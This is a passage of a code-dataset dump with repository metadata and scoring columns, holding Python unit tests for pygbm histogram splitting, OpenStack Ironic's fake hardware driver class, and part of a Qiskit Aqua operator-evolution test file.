max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
|---|---|---|---|---|---|---|---|---|---|---|
tests/unit/plain/test_splitting.py
|
Goorman/pygbm
| 0
|
6627551
|
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.testing import assert_array_almost_equal
import pytest
from pygbm.plain.splitting import _find_histogram_split
from pygbm.plain.splitting import (SplittingContext, find_node_split,
find_node_split_subtraction,
split_indices)
@pytest.mark.parametrize('n_bins', [3, 32, 256])
def test_histogram_split(n_bins):
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(int(1e4), 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(binned_feature.shape[0], dtype=np.uint32)
ordered_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_hessians = ordered_hessians
for true_bin in range(1, n_bins - 1):
for sign in [-1, 1]:
ordered_gradients = np.full_like(binned_feature, sign,
dtype=np.float32)
ordered_gradients[binned_feature <= true_bin] *= -1
all_gradients = ordered_gradients
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned,
n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx,
sample_indices)
assert split_info.bin_idx == true_bin
assert split_info.gain >= 0
assert split_info.feature_idx == feature_idx
assert (split_info.n_samples_left + split_info.n_samples_right
== sample_indices.shape[0])
# Constant hessian: 1. per sample.
assert split_info.n_samples_left == split_info.hessian_left
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_split_vs_split_subtraction(constant_hessian):
# Make sure find_node_split and find_node_split_subtraction return the
# same results.
# Should we add a test about computation time to make sure
# time(subtraction) < time(regular)?
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure histograms from classical and subtraction method are the same
for hists, hists_sub in ((hists_left, hists_left_sub),
(hists_right, hists_right_sub)):
for hist, hist_sub in zip(hists, hists_sub):
for key in ('count', 'sum_hessians', 'sum_gradients'):
assert_array_almost_equal(hist[key], hist_sub[key], decimal=4)
# make sure split_infos from classical and subtraction method are the same
for si, si_sub in ((si_left, si_left_sub), (si_right, si_right_sub)):
assert_almost_equal(si.gain, si_sub.gain, decimal=3)
assert_almost_equal(si.feature_idx, si_sub.feature_idx, decimal=3)
assert_almost_equal(si.gradient_left, si_sub.gradient_left, decimal=3)
assert_almost_equal(si.gradient_right, si_sub.gradient_right,
decimal=3)
assert_almost_equal(si.hessian_right, si_sub.hessian_right, decimal=3)
assert_almost_equal(si.hessian_left, si_sub.hessian_left, decimal=3)
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_gradient_and_hessian_sanity(constant_hessian):
# This test checks that the values of gradients and hessians are
# consistent in different places:
# - in split_info: si.gradient_left + si.gradient_right must be equal to
# the gradient at the node. Same for hessians.
# - in the histograms: summing 'sum_gradients' over the bins must be
# constant across all features, and those sums must be equal to the
# node's gradient. Same for hessians.
#
# These checks are carried out for split_info and histograms resulting
# from both find_node_split() and find_node_split_subtraction().
#
# The structure of this test is exactly the same as in
# test_split_vs_split_subtraction() but it's probably best to keep them
# separate because they're not checking the same things.
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure that si.gradient_left + si.gradient_right have their expected
# value, same for hessians
for si, indices in (
(si_parent, sample_indices),
(si_left, sample_indices_left),
(si_left_sub, sample_indices_left),
(si_right, sample_indices_right),
(si_right_sub, sample_indices_right)):
gradient = si.gradient_right + si.gradient_left
expected_gradient = all_gradients[indices].sum()
hessian = si.hessian_right + si.hessian_left
if constant_hessian:
expected_hessian = indices.shape[0] * all_hessians[0]
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradient, expected_gradient, decimal=3)
assert_almost_equal(hessian, expected_hessian, decimal=3)
# make sure sum of gradients in histograms are the same for all features,
# and make sure they're equal to their expected value
for hists, indices in (
(hists_parent, sample_indices),
(hists_left, sample_indices_left),
(hists_left_sub, sample_indices_left),
(hists_right, sample_indices_right),
(hists_right_sub, sample_indices_right)):
# note: gradients and hessians have shape (n_features,),
# we're comparing them to *scalars*. This has the benefit of also
# making sure that all the entries are equal.
gradients = hists['sum_gradients'].sum(axis=1) # shape = (n_features,)
expected_gradient = all_gradients[indices].sum() # scalar
hessians = hists['sum_hessians'].sum(axis=1)
if constant_hessian:
# 0 is not the actual hessian, but it's not computed in this case
expected_hessian = 0.
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradients, expected_gradient, decimal=4)
assert_almost_equal(hessians, expected_hessian, decimal=4)
def test_split_indices():
# Check that split_indices returns the correct splits and that
# splitting_context.partition is consistent with what is returned.
rng = np.random.RandomState(421)
n_bins = 5
n_samples = 10
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
# split will happen on feature 1 and on bin 3
X_binned = [[0, 0],
[0, 3],
[0, 4],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 4],
[0, 0],
[0, 4]]
X_binned = np.asfortranarray(X_binned, dtype=np.uint8)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
all_hessians = np.ones(1, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
assert_array_almost_equal(sample_indices, context.partition)
si_root, _ = find_node_split(context, sample_indices)
# sanity checks for best split
assert si_root.feature_idx == 1
assert si_root.bin_idx == 3
samples_left, samples_right = split_indices(
context, si_root, context.partition.view())
assert set(samples_left) == set([0, 1, 3, 4, 5, 6, 8])
assert set(samples_right) == set([2, 7, 9])
position_right = len(samples_left)
assert_array_almost_equal(samples_left,
context.partition[:position_right])
assert_array_almost_equal(samples_right,
context.partition[position_right:])
# Check that the resulting split indices sizes are consistent with the
# count statistics anticipated when looking for the best split.
assert samples_left.shape[0] == si_root.n_samples_left
assert samples_right.shape[0] == si_root.n_samples_right
def test_min_gain_to_split():
# Try to split a pure node (all gradients are equal, same for hessians)
# with min_gain_to_split = 0 and make sure that the node is not split (best
# possible gain = -1). Note: before the strict inequality comparison, this
# test would fail because the node would be split with a gain of 0.
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 0
min_samples_leaf = 1
min_gain_to_split = 0.
n_bins = 255
n_samples = 100
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(n_samples, 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_gradients = np.ones_like(binned_feature, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins, n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx, sample_indices)
assert split_info.gain == -1
|
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.testing import assert_array_almost_equal
import pytest
from pygbm.plain.splitting import _find_histogram_split
from pygbm.plain.splitting import (SplittingContext, find_node_split,
find_node_split_subtraction,
split_indices)
@pytest.mark.parametrize('n_bins', [3, 32, 256])
def test_histogram_split(n_bins):
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(int(1e4), 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(binned_feature.shape[0], dtype=np.uint32)
ordered_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_hessians = ordered_hessians
for true_bin in range(1, n_bins - 1):
for sign in [-1, 1]:
ordered_gradients = np.full_like(binned_feature, sign,
dtype=np.float32)
ordered_gradients[binned_feature <= true_bin] *= -1
all_gradients = ordered_gradients
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned,
n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx,
sample_indices)
assert split_info.bin_idx == true_bin
assert split_info.gain >= 0
assert split_info.feature_idx == feature_idx
assert (split_info.n_samples_left + split_info.n_samples_right
== sample_indices.shape[0])
# Constant hessian: 1. per sample.
assert split_info.n_samples_left == split_info.hessian_left
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_split_vs_split_subtraction(constant_hessian):
# Make sure find_node_split and find_node_split_subtraction return the
# same results.
# Should we add a test about computation time to make sure
# time(subtraction) < time(regular)?
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure histograms from classical and subtraction method are the same
for hists, hists_sub in ((hists_left, hists_left_sub),
(hists_right, hists_right_sub)):
for hist, hist_sub in zip(hists, hists_sub):
for key in ('count', 'sum_hessians', 'sum_gradients'):
assert_array_almost_equal(hist[key], hist_sub[key], decimal=4)
# make sure split_infos from classical and subtraction method are the same
for si, si_sub in ((si_left, si_left_sub), (si_right, si_right_sub)):
assert_almost_equal(si.gain, si_sub.gain, decimal=3)
assert_almost_equal(si.feature_idx, si_sub.feature_idx, decimal=3)
assert_almost_equal(si.gradient_left, si_sub.gradient_left, decimal=3)
assert_almost_equal(si.gradient_right, si_sub.gradient_right,
decimal=3)
assert_almost_equal(si.hessian_right, si_sub.hessian_right, decimal=3)
assert_almost_equal(si.hessian_left, si_sub.hessian_left, decimal=3)
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_gradient_and_hessian_sanity(constant_hessian):
# This test checks that the values of gradients and hessians are
# consistent in different places:
# - in split_info: si.gradient_left + si.gradient_right must be equal to
# the gradient at the node. Same for hessians.
# - in the histograms: summing 'sum_gradients' over the bins must be
# constant across all features, and those sums must be equal to the
# node's gradient. Same for hessians.
#
# These checks are carried out for split_info and histograms resulting
# from both find_node_split() and find_node_split_subtraction().
#
# The structure of this test is exactly the same as in
# test_split_vs_split_subtraction() but it's probably best to keep them
# separate because they're not checking the same things.
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure that si.gradient_left + si.gradient_right have their expected
# value, same for hessians
for si, indices in (
(si_parent, sample_indices),
(si_left, sample_indices_left),
(si_left_sub, sample_indices_left),
(si_right, sample_indices_right),
(si_right_sub, sample_indices_right)):
gradient = si.gradient_right + si.gradient_left
expected_gradient = all_gradients[indices].sum()
hessian = si.hessian_right + si.hessian_left
if constant_hessian:
expected_hessian = indices.shape[0] * all_hessians[0]
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradient, expected_gradient, decimal=3)
assert_almost_equal(hessian, expected_hessian, decimal=3)
# make sure sum of gradients in histograms are the same for all features,
# and make sure they're equal to their expected value
for hists, indices in (
(hists_parent, sample_indices),
(hists_left, sample_indices_left),
(hists_left_sub, sample_indices_left),
(hists_right, sample_indices_right),
(hists_right_sub, sample_indices_right)):
# note: gradients and hessians have shape (n_features,),
# we're comparing them to *scalars*. This has the benefit of also
# making sure that all the entries are equal.
gradients = hists['sum_gradients'].sum(axis=1) # shape = (n_features,)
expected_gradient = all_gradients[indices].sum() # scalar
hessians = hists['sum_hessians'].sum(axis=1)
if constant_hessian:
# 0 is not the actual hessian, but it's not computed in this case
expected_hessian = 0.
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradients, expected_gradient, decimal=4)
assert_almost_equal(hessians, expected_hessian, decimal=4)
def test_split_indices():
# Check that split_indices returns the correct splits and that
# splitting_context.partition is consistent with what is returned.
rng = np.random.RandomState(421)
n_bins = 5
n_samples = 10
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
# split will happen on feature 1 and on bin 3
X_binned = [[0, 0],
[0, 3],
[0, 4],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 4],
[0, 0],
[0, 4]]
X_binned = np.asfortranarray(X_binned, dtype=np.uint8)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
all_hessians = np.ones(1, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
assert_array_almost_equal(sample_indices, context.partition)
si_root, _ = find_node_split(context, sample_indices)
# sanity checks for best split
assert si_root.feature_idx == 1
assert si_root.bin_idx == 3
samples_left, samples_right = split_indices(
context, si_root, context.partition.view())
assert set(samples_left) == set([0, 1, 3, 4, 5, 6, 8])
assert set(samples_right) == set([2, 7, 9])
position_right = len(samples_left)
assert_array_almost_equal(samples_left,
context.partition[:position_right])
assert_array_almost_equal(samples_right,
context.partition[position_right:])
# Check that the resulting split indices sizes are consistent with the
# count statistics anticipated when looking for the best split.
assert samples_left.shape[0] == si_root.n_samples_left
assert samples_right.shape[0] == si_root.n_samples_right
def test_min_gain_to_split():
# Try to split a pure node (all gradients are equal, same for hessians)
# with min_gain_to_split = 0 and make sure that the node is not split (best
# possible gain = -1). Note: before the strict inequality comparison, this
# test would fail because the node would be split with a gain of 0.
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 0
min_samples_leaf = 1
min_gain_to_split = 0.
n_bins = 255
n_samples = 100
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(n_samples, 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_gradients = np.ones_like(binned_feature, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins, n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx, sample_indices)
assert split_info.gain == -1
|
en
| 0.901369
|
# Constant hessian: 1. per sample. # Make sure find_node_split and find_node_split_subtraction return the # same results. # Should we add a test about computation time to make sure # time(subtraction) < time(regular)? # first split parent, left and right with classical method # split left with subtraction method # split right with subtraction method # make sure histograms from classical and subtraction method are the same # make sure split_infos from classical and subtraction method are the same # This test checks that the values of gradients and hessians are # consistent in different places: # - in split_info: si.gradient_left + si.gradient_right must be equal to # the gradient at the node. Same for hessians. # - in the histograms: summing 'sum_gradients' over the bins must be # constant across all features, and those sums must be equal to the # node's gradient. Same for hessians. # # These checks are carried out for split_info and histograms resulting # from both find_node_split() and find_node_split_subtraction(). # # The structure of this test is exactly the same as in # test_split_vs_split_subtraction() but it's probably best to keep them # separate because they're not checking the same things. # first split parent, left and right with classical method # split left with subtraction method # split right with subtraction method # make sure that si.gradient_left + si.gradient_right have their expected # value, same for hessians # make sure sum of gradients in histograms are the same for all features, # and make sure they're equal to their expected value # note: gradients and hessians have shape (n_features,), # we're comparing them to *scalars*. This has the benefit of also # making sure that all the entries are equal. # shape = (n_features,) # scalar # 0 is not the actual hessian, but it's not computed in this case # Check that split_indices returns the correct splits and that # splitting_context.partition is consistent with what is returned. 
# split will happen on feature 1 and on bin 3 # sanity checks for best split # Check that the resulting split indices sizes are consistent with the # count statistics anticipated when looking for the best split. # Try to split a pure node (all gradients are equal, same for hessians) # with min_gain_to_split = 0 and make sure that the node is not split (best # possible gain = -1). Note: before the strict inequality comparison, this # test would fail because the node would be split with a gain of 0.
| 2.287123
| 2
|
ironic/drivers/fake_hardware.py
|
dangervon/ironic
| 0
|
6627552
|
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fake hardware type.
"""
from ironic.drivers import generic
from ironic.drivers.modules import fake
class FakeHardware(generic.GenericHardware):
"""Fake hardware type.
This hardware type is special-cased in the driver factory to bypass
compatibility verification. Thus, supported_* methods here are only
for calculating the defaults, not for actual check.
All fake implementations are still expected to be enabled in the
configuration.
"""
@property
def supported_bios_interfaces(self):
"""List of classes of supported bios interfaces."""
return [fake.FakeBIOS] + super().supported_bios_interfaces
@property
def supported_boot_interfaces(self):
"""List of classes of supported boot interfaces."""
return [fake.FakeBoot] + super().supported_boot_interfaces
@property
def supported_console_interfaces(self):
"""List of classes of supported console interfaces."""
return [fake.FakeConsole] + super().supported_console_interfaces
@property
def supported_deploy_interfaces(self):
"""List of classes of supported deploy interfaces."""
return [fake.FakeDeploy] + super().supported_deploy_interfaces
@property
def supported_inspect_interfaces(self):
"""List of classes of supported inspect interfaces."""
return [fake.FakeInspect] + super().supported_inspect_interfaces
@property
def supported_management_interfaces(self):
"""List of classes of supported management interfaces."""
return [fake.FakeManagement]
@property
def supported_power_interfaces(self):
"""List of classes of supported power interfaces."""
return [fake.FakePower]
@property
def supported_raid_interfaces(self):
"""List of classes of supported raid interfaces."""
return [fake.FakeRAID] + super().supported_raid_interfaces
@property
def supported_rescue_interfaces(self):
"""List of classes of supported rescue interfaces."""
return [fake.FakeRescue] + super().supported_rescue_interfaces
@property
def supported_storage_interfaces(self):
"""List of classes of supported storage interfaces."""
return [fake.FakeStorage] + super().supported_storage_interfaces
@property
def supported_vendor_interfaces(self):
"""List of classes of supported rescue interfaces."""
return [
fake.FakeVendorB, fake.FakeVendorA
] + super().supported_vendor_interfaces
|
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fake hardware type.
"""
from ironic.drivers import generic
from ironic.drivers.modules import fake
class FakeHardware(generic.GenericHardware):
    """Fake hardware type.
    This hardware type is special-cased in the driver factory to bypass
    compatibility verification. Thus, supported_* methods here are only
    for calculating the defaults, not for actual check.
    All fake implementations are still expected to be enabled in the
    configuration.
    """
    @property
    def supported_bios_interfaces(self):
        """List of classes of supported bios interfaces."""
        # The fake implementation is prepended so it becomes the default
        # for this hardware type; real implementations remain available.
        return [fake.FakeBIOS] + super().supported_bios_interfaces
    @property
    def supported_boot_interfaces(self):
        """List of classes of supported boot interfaces."""
        return [fake.FakeBoot] + super().supported_boot_interfaces
    @property
    def supported_console_interfaces(self):
        """List of classes of supported console interfaces."""
        return [fake.FakeConsole] + super().supported_console_interfaces
    @property
    def supported_deploy_interfaces(self):
        """List of classes of supported deploy interfaces."""
        return [fake.FakeDeploy] + super().supported_deploy_interfaces
    @property
    def supported_inspect_interfaces(self):
        """List of classes of supported inspect interfaces."""
        return [fake.FakeInspect] + super().supported_inspect_interfaces
    @property
    def supported_management_interfaces(self):
        """List of classes of supported management interfaces."""
        # NOTE: unlike most interfaces here, the base class's
        # implementations are deliberately NOT included.
        return [fake.FakeManagement]
    @property
    def supported_power_interfaces(self):
        """List of classes of supported power interfaces."""
        # Only the fake implementation is supported (no super() call).
        return [fake.FakePower]
    @property
    def supported_raid_interfaces(self):
        """List of classes of supported raid interfaces."""
        return [fake.FakeRAID] + super().supported_raid_interfaces
    @property
    def supported_rescue_interfaces(self):
        """List of classes of supported rescue interfaces."""
        return [fake.FakeRescue] + super().supported_rescue_interfaces
    @property
    def supported_storage_interfaces(self):
        """List of classes of supported storage interfaces."""
        return [fake.FakeStorage] + super().supported_storage_interfaces
    @property
    def supported_vendor_interfaces(self):
        """List of classes of supported vendor interfaces."""
        # Two fake vendor implementations are prepended; FakeVendorB is
        # listed first and therefore becomes the default.
        return [
            fake.FakeVendorB, fake.FakeVendorA
        ] + super().supported_vendor_interfaces
|
en
| 0.8504
|
# Copyright 2016 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. Fake hardware type. Fake hardware type. This hardware type is special-cased in the driver factory to bypass compatibility verification. Thus, supported_* methods here are only for calculating the defaults, not for actual check. All fake implementations are still expected to be enabled in the configuration. List of classes of supported bios interfaces. List of classes of supported boot interfaces. List of classes of supported console interfaces. List of classes of supported deploy interfaces. List of classes of supported inspect interfaces. List of classes of supported management interfaces. List of classes of supported power interfaces. List of classes of supported raid interfaces. List of classes of supported rescue interfaces. List of classes of supported storage interfaces. List of classes of supported rescue interfaces.
| 1.742792
| 2
|
test/aqua/operators/test_evolution.py
|
Milos9304/qiskit-aqua
| 2
|
6627553
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Evolution """
import unittest
from test.aqua import QiskitAquaTestCase
import numpy as np
import scipy.linalg
import qiskit
from qiskit.circuit import ParameterVector, Parameter
from qiskit.aqua.operators import (X, Y, Z, I, CX, H, ListOp, CircuitOp, Zero, EvolutionFactory,
EvolvedOp, PauliTrotterEvolution, QDrift)
# pylint: disable=invalid-name
class TestEvolution(QiskitAquaTestCase):
    """Evolution tests: Trotterization, QDrift and parameter binding."""
    def test_exp_i(self):
        """ exponential of Pauli test """
        op = Z.exp_i()
        # exp(-iZ) compiles to a single RZ rotation with angle 2.
        gate = op.to_circuit().data[0][0]
        self.assertIsInstance(gate, qiskit.circuit.library.RZGate)
        self.assertEqual(gate.params[0], 2)
    def test_trotter_with_identity(self):
        """ trotterization of operator with identity term """
        op = (2.0 * I ^ I) + (Z ^ Y)
        # Reference: exact matrix exponential of the full operator.
        exact_matrix = scipy.linalg.expm(-1j * op.to_matrix())
        evo = PauliTrotterEvolution(trotter_mode='suzuki', reps=2)
        with self.subTest('all PauliOp terms'):
            circ_op = evo.convert(EvolvedOp(op))
            circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
            np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
        with self.subTest('MatrixOp identity term'):
            op = (2.0 * I ^ I).to_matrix_op() + (Z ^ Y)
            circ_op = evo.convert(EvolvedOp(op))
            circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
            np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
        with self.subTest('CircuitOp identity term'):
            op = (2.0 * I ^ I).to_circuit_op() + (Z ^ Y)
            circ_op = evo.convert(EvolvedOp(op))
            circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
            np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
    def test_pauli_evolution(self):
        """ pauli evolution test """
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z)
        evolution = EvolutionFactory.build(operator=op)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = ((np.pi / 2) * op).exp_i() @ CX @ (H ^ I) @ Zero
        # Only a smoke test: conversion must succeed and return something.
        mean = evolution.convert(wf)
        self.assertIsNotNone(mean)
